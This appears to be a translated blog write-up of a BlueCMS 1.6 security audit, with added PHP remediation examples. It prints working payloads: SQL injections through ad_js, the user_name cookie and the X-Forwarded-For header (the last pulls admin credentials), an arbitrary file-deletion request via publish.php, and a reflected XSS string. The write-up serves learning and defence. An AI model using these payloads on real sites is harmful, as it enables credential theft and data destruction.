BlueCMS 1.6 code audit

ad_js SQL injection

Numeric injection:

1%20union%20select%201,2,3,4,5,6,(select%20user())


common.inc.php SQL injection

This file is included by other scripts and provides shared functions and configuration, so any script that includes it inherits the injection. publish.php, for example, includes it.
The injection point in common.inc.php:

if(!$_SESSION['user_id'])
{
    if($_COOKIE['BLUE']['user_id'] && $_COOKIE['BLUE']['user_name'] && $_COOKIE['BLUE']['user_pwd'])
    {
        if(check_cookie($_COOKIE['BLUE']['user_name'], $_COOKIE['BLUE']['user_pwd']))
        {
            update_user_info($_COOKIE['BLUE']['user_name']);
        }
    }
    else if($_COOKIE['BLUE']['user_name'])
    {
        // the raw cookie value is concatenated into the query: no escaping, no type check
        $user_name = $_COOKIE['BLUE']['user_name'];
        $user = $db->query("SELECT COUNT(*) AS num FROM ".table('user')." WHERE user_name='$user_name'");
    }
}

If there is no logged-in session and only $_COOKIE['BLUE']['user_name'] has a value, that value goes straight into the SQL query. It looks like only blind injection is possible here.
The page redirects to the login page automatically after a delay; to see the result clearly, I first commented out the redirect:
Nothing is filtered, and the time delay succeeds.
PoC:

BLUE[user_name]:w4'and if(((ascii(mid((select database()),1,1)))=98),sleep(3),0)#
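For comparison, here is the same cookie lookup written with a bound parameter. This is an added example, not BlueCMS code; the PDO handle $pdo, the "blue_" table prefix behind table() and the user-name character rule are assumptions.

```php
<?php
// Added example (not BlueCMS code): the cookie-driven user lookup from
// common.inc.php rewritten with a prepared statement. The PDO handle $pdo,
// the "blue_" table prefix and the user-name character rule are assumed.

function table(string $name): string
{
    return 'blue_' . $name;          // assumed prefix, mirroring the original table() helper
}

function count_user_by_name(PDO $pdo, string $user_name): int
{
    // The cookie value is bound as a parameter, never concatenated into the SQL,
    // so quote characters, "#" comments and IF(..., SLEEP(), ...) are plain data.
    $stmt = $pdo->prepare('SELECT COUNT(*) AS num FROM ' . table('user') . ' WHERE user_name = :name');
    $stmt->execute([':name' => $user_name]);
    return (int) $stmt->fetchColumn();
}

if (empty($_SESSION['user_id']) && !empty($_COOKIE['BLUE']['user_name'])) {
    $user_name = (string) $_COOKIE['BLUE']['user_name'];
    // Defence in depth: reject values the registration form would never have accepted.
    if (!preg_match('/^[A-Za-z0-9_]{1,30}$/', $user_name)) {
        $user_name = '';
    }
    $num = $user_name === '' ? 0 : count_user_by_name($pdo, $user_name);
}
```

The prepared statement is the actual fix; the character allow-list only narrows the attack surface further and must match whatever the registration form permits, otherwise legitimate users are locked out of the cookie login.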

publish.php arbitrary file deletion

At line 316:
The $act parameter is user-controllable:
The id mentioned above is also controllable. Create a test file, then request:

publish.php?act=del_pic&id=test.php

Visit the test file again: it has been deleted.
There are many places with this kind of arbitrary file deletion; this is just one of them.
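A del_pic handler that cannot be pointed at arbitrary files, as an added example (not BlueCMS code). UPLOAD_DIR and the accepted file-name pattern are assumptions.

```php
<?php
// Added example (not BlueCMS code): a del_pic handler that only removes files
// inside the upload directory. UPLOAD_DIR and the name pattern are assumed.

const UPLOAD_DIR = '/var/www/bluecms/data/upload';   // assumed location of uploaded pictures

function delete_upload(string $id): bool
{
    // Drop any directory component: "../../test.php" becomes "test.php".
    $name = basename($id);
    // Accept only the shapes an image upload would have produced.
    if (!preg_match('/^[A-Za-z0-9_\-]+\.(jpe?g|png|gif)$/i', $name)) {
        return false;
    }
    $base   = realpath(UPLOAD_DIR);
    $target = realpath(UPLOAD_DIR . '/' . $name);
    // realpath() follows symlinks, so a link that points outside the base
    // directory resolves to its real location and is refused here.
    if ($base === false || $target === false
        || strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    return unlink($target);
}

if (($_GET['act'] ?? '') === 'del_pic') {
    $ok = delete_upload((string) ($_GET['id'] ?? ''));
    echo $ok ? 'deleted' : 'refused';
}
```

The more robust design is to take a numeric picture id, look the stored path up in the database and check that the record belongs to the logged-in user, so that the file name never comes from the request at all; the path check above is the minimum that stops the traversal shown here.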

user.php XSS

There is an XSS in the mail field.

admin/card.php XSS (reflected)

The name parameter is output directly without any filtering, so it can only be used to pop an alert box:

name=<script>alert(1)</script>&value=1&price=1&act=do_edit&id=1


user.php file inclusion

There is a controllable include point here, but index.php is appended after it and %00 truncation does not succeed. Following an online article, I tried the idea that

The maximum path length is 256 bytes on Windows and 4096 bytes on Linux

on version 5.2, but the include could not be made to work no matter what; leaving a placeholder here.

comment.php XFF injection

Payload:

1','1'),('','1','2','1','6',(select concat(admin_name,':',pwd) from blue_admin),'1','1
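The header reaches the INSERT statement as raw text; the following added example (not BlueCMS code) shows the two defensive steps that neutralise it: deciding which IP to record from the server's own view of the connection, and binding every value. TRUSTED_PROXIES and the blue_comment column names are assumptions.

```php
<?php
// Added example (not BlueCMS code): recording a commenter's IP address without
// letting the X-Forwarded-For header reach the SQL statement as raw text.
// TRUSTED_PROXIES and the blue_comment column names are assumed.

const TRUSTED_PROXIES = ['10.0.0.2'];   // assumed address of a reverse proxy, if any

function client_ip(array $server): string
{
    // REMOTE_ADDR is set by the web server from the TCP connection; anything in
    // X-Forwarded-For is client-supplied unless a trusted proxy rewrote it.
    $ip  = (string) ($server['REMOTE_ADDR'] ?? '');
    $xff = (string) ($server['HTTP_X_FORWARDED_FOR'] ?? '');
    if ($xff !== '' && in_array($ip, TRUSTED_PROXIES, true)) {
        $first = trim(explode(',', $xff)[0]);       // left-most hop is the original client
        if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
            $ip = $first;
        }
    }
    // Whatever we end up with must parse as an IP literal; otherwise store a sentinel.
    return filter_var($ip, FILTER_VALIDATE_IP) !== false ? $ip : '0.0.0.0';
}

function insert_comment(PDO $pdo, int $post_id, int $user_id, string $content, array $server): void
{
    // Every value is a bound parameter, so a header that tries to close the
    // VALUES list early is stored as an ordinary string, not executed.
    $stmt = $pdo->prepare(
        'INSERT INTO blue_comment (post_id, user_id, content, ip, pub_date) ' .
        'VALUES (:post_id, :user_id, :content, :ip, :pub_date)'
    );
    $stmt->execute([
        ':post_id'  => $post_id,
        ':user_id'  => $user_id,
        ':content'  => $content,
        ':ip'       => client_ip($server),
        ':pub_date' => time(),
    ]);
}

// Constructed request: the header is ignored because REMOTE_ADDR is not a trusted proxy.
$fake_server = [
    'REMOTE_ADDR'          => '203.0.113.7',          // constructed
    'HTTP_X_FORWARDED_FOR' => "not-an-ip', 'x",       // constructed
];
echo client_ip($fake_server), PHP_EOL;                // 203.0.113.7
```

Even with a prepared statement, validating the address matters: an ip column that accepts free text lets a forged header carry payloads into every page that later renders the stored value.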


tpl_manage.php arbitrary file modification

[The original documents this finding with screenshots only.]

user.php arbitrary redirect

This could perhaps be used for SSRF; the target has to be base64 encoded.
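One way to keep a base64-encoded redirect parameter from becoming an open redirect, as an added example (not BlueCMS code). The parameter name "url" and the allowed host list are assumptions.

```php
<?php
// Added example (not BlueCMS code): validating a base64-encoded redirect target
// against an allow-list of hosts before issuing the Location header.
// The parameter name "url" and ALLOWED_HOSTS are assumed.

const ALLOWED_HOSTS = ['www.example.com'];   // assumed: the site's own host name(s)

function safe_redirect_target(string $encoded, string $fallback = '/'): string
{
    // Strict decoding rejects anything that is not valid base64.
    $url = base64_decode($encoded, true);
    if ($url === false || $url === '' || preg_match('/[\x00-\x1f\\\\]/', $url)) {
        return $fallback;                       // control characters or backslashes: refuse
    }
    $p = parse_url($url);
    if ($p === false) {
        return $fallback;
    }
    if (!isset($p['scheme']) && !isset($p['host'])) {
        // Site-relative path such as /user.php?act=index. parse_url() reports
        // "//evil.example/x" as having a host, so it never reaches this branch.
        return (isset($p['path']) && $p['path'] !== '' && $p['path'][0] === '/') ? $url : $fallback;
    }
    $scheme = strtolower($p['scheme'] ?? '');
    $host   = strtolower($p['host'] ?? '');
    // Absolute URLs: only http(s) to one of our own hosts. This also rejects
    // javascript:, data: and non-web schemes a server-side fetch might follow.
    if (in_array($scheme, ['http', 'https'], true) && in_array($host, ALLOWED_HOSTS, true)) {
        return $url;
    }
    return $fallback;
}

$target = safe_redirect_target((string) ($_GET['url'] ?? ''));
header('Location: ' . $target);
exit;
```

Because parse_url() places credentials before "@" in the user field, a target such as http://www.example.com@evil.example/ is still parsed with evil.example as the host and is refused by the allow-list.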

Summary

This was the first time I looked at a CMS and I did not know where to start. I am still a bit weak at this, and sometimes did not notice fairly obvious holes. Still, the code of a small CMS is not so complicated and its vulnerabilities are relatively simple and easy to exploit, so it is a good one to begin with; a fairly small harvest. After trying this CMS, the most important lesson is to start from where user input enters the application. Is this just a small source of instability? (Nah)


Source: www.cnblogs.com/W4nder/p/12528857.html